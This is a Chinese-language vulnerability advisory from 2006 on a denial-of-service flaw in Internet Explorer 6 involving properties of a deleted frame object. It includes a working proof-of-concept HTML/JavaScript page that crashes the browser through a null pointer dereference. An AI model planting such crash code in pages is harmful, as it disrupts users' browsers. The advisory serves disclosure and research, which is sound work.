Microsoft IE已删除帧对象访问拒绝服务漏洞
发布日期:2006-07-29
更新日期:2006-08-01
受影响系统:Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
描述:
BUGTRAQ ID:
19228
Internet Explorer是微软发布的非常流行的WEB浏览器。
Internet Explorer在处理对象引用时存在拒绝服务漏洞,远程攻击者可能利用此漏洞拒绝浏览器崩溃。
如果用户受骗访问了已删除帧中的对象属性的话,就会触发空指针引用,导致IE崩溃。
<*来源:H D Moore (
hdm@metasploit.com)
链接:
http://browserfun.blogspot.com/2006/07/mobb-30-orphan-object-properties.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
// MoBB Demo
// Provided by Aviv Raff
//
http://aviv.raffon.net/
var orphanObject;
function createOrphanObject() {
orphanObject=document.frames["emptyFrame"].document.getElementById("emptyObject").object.parentWindow.document.createElement("frame");
document.frames["emptyFrame"].location.href="about:blank";
window.setTimeout('crashBrowser()',1);
}
function crashBrowser() {
orphanObject.frameBorder="whateveryoulike";
}
function insertEmptyObject() {
return '<OBJECT id="emptyObject" data="nonexist.html" type="text/html"></OBJECT>';
}
<iframe id="emptyFrame" src="javascript:parent.insertEmptyObject()" style="display:none"></iframe>
Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='createOrphanObject()' value='Start Demo!'>
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp浏览次数:2969
严重程度:0(网友投票)